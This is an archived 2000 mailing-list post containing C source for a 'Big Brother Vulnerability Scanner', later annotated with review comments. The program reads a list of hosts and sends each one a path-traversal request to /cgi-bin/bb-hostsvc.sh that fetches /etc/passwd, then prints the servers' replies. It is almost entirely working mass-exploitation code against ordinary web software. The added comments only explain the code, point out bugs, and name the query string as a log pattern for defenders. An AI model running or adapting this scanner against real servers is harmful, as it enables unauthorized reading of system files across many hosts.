
Big Brother Vulnerability Scanner


From: safety () LINUXMAIL ORG (Marcus Danielsson)
Date: Wed, 12 Jul 2000 02:19:43 -0000


/* 
 *
 *      2000-07-11 
 *        
 *      Ripped from  phfscan.c 
 *      Big Brother Vulnerability scanner.
 *      Scans for /cgi-bin/bb-hostsvc.sh.
 *      If it exists you might be able to read files from
 *      the system through its HOSTSVC parameter. Good luck.
 *
 *       
 *       Author:  Safety@IRCnet who also discovered the bug.
 *                Safety () LinuxMail ORG
 *
 *
 *       Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
 *                Bjurr, Metoo, and everyone else who thinks they should
 *                be on this list.
 *      
 *       Special Thanks goes to Loki who is going to host and design
 *       my homepage.
 * 
 *
 *       Usage:
 *
 *       ./bbscan < hostlist > outputfile
 *
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>

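/* Timeout flag: main sets it to 1 before each connect(); Call() clears it. */
int FLAG = 1;

/*
 * Handler that main installs for SIGALRM around connect().  Clearing FLAG
 * tells main that the 10 second alarm expired, so the connection attempt
 * is treated as failed.
 *
 * signo: signal number delivered by the kernel; not used.
 * Returns 0.  The function is declared int, and the original fell off the
 * end without returning a value, which is undefined as soon as a caller
 * reads the result.
 *
 * NOTE(review): signal() expects a void (*)(int) handler; the int return
 * type is kept here only so existing references to Call keep compiling.
 */
int Call(int signo)
{
 (void) signo;
 FLAG = 0;
 return 0;
}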

/*
 * Entry point: for every host name read from stdin (one per line), echo the
 * name to stdout, resolve it, connect to TCP port 80 under a 10 second
 * alarm() timeout, send the fixed request held in bbvuln and copy whatever
 * the server returns to stdout.  Returns 0 once stdin is exhausted.
 *
 * Defender view: the request targets /cgi-bin/bb-hostsvc.sh with a HOSTSVC
 * value made of repeated ../ segments followed by /etc/passwd.  That query
 * string is the pattern to search for in web server access logs.
 * NOTE(review): presumably the script builds a file path from HOSTSVC; if
 * so it has to reject values containing ../ or a leading slash before it
 * opens anything - confirm against the script itself.
 *
 * NOTE(review): no return type is declared (implicit int), argc and argv
 * are unused, and the locals buffer, serv_len, len, c and outfd are never
 * referenced.  strlen, memset, memcpy and strncpy are called but <string.h>
 * is not among the includes visible in this file.
 */
main (int argc, char *argv[])
{
  char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  int outsocket, serv_len, len,X,c,outfd;
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr outgoing;

  /* Request sent to every host: a bare GET line with no HTTP version and
     no Host header, ending in a blank line.  The literal is split across
     two source lines by the mail archive wrapping. */
  char bbvuln[]="GET
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

  /* One host per line.  fgets is capped at 100 bytes although hosta holds
     1024, so a longer input line is split over several iterations. */
  while(fgets(hosta,100,stdin))
    {
      /* Stop if the line starts with a NUL byte. */
      if(hosta[0] == '\0')
        break;
      /* Drops the last character, assumed to be the newline.
         NOTE(review): a final line without a newline loses its last real
         character instead. */
      hosta[strlen(hosta) -1] = '\0';
      /* Echo the host name on its own line so the output can be matched
         to the response that follows it. */
      write(1,hosta,strlen(hosta)*sizeof(char));
        write(1,"\n",sizeof(char));
      /* NOTE(review): the socket() result is not checked. */
      outsocket = socket (AF_INET, SOCK_STREAM, 0);
      memset (&serv_addr, 0, sizeof (serv_addr));
      serv_addr.sin_family = AF_INET;
     
      /* NOTE(review): gethostbyname() returns NULL for a name that does
         not resolve, and the result is dereferenced in the memcpy below
         without a check. */
      nametocheck = gethostbyname (hosta);

      /* Ugly stuff to get host name into inet_ntoa form */
      (void *) memcpy (&outgoing.s_addr,
nametocheck->h_addr_list[0],
                       sizeof (outgoing.s_addr));
      /* Round trip through dotted quad text and back to a binary address.
         strncpy does not terminate on truncation, but a dotted quad is at
         most 15 characters so it fits in host[100]. */
      strncpy(host, inet_ntoa (outgoing), 100);
      serv_addr.sin_addr.s_addr = inet_addr (host);
      serv_addr.sin_port = htons (80);
      /* Call clears FLAG when SIGALRM is delivered.  NOTE(review): Call is
         declared int (int), which is not the handler type signal() takes. */
      signal(SIGALRM,Call);
      FLAG = 1;

      /* Arm a 10 second alarm around connect() and cancel it afterwards. */
      alarm(10);    

      X=connect (outsocket, (struct sockaddr *) &serv_addr,
sizeof (serv_addr));
      alarm(0);

      /* Proceed only if the alarm did not fire and connect() returned 0. */
      if(FLAG == 1 && X==0){
       write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
       /* Copy the response to stdout in chunks of up to 8096 bytes until
          read() returns 0.  NOTE(review): an error return of -1 is not
          equal to 0, so it is handed to write() as the length and the
          loop does not end on a persistent read error. */
       while((X=read(outsocket,FileBuf,8096))!=0)
          write(1,FileBuf,X);
        }
      /* The socket is closed on every iteration, connected or not. */
      close (outsocket);   
    }
  return 0;
}

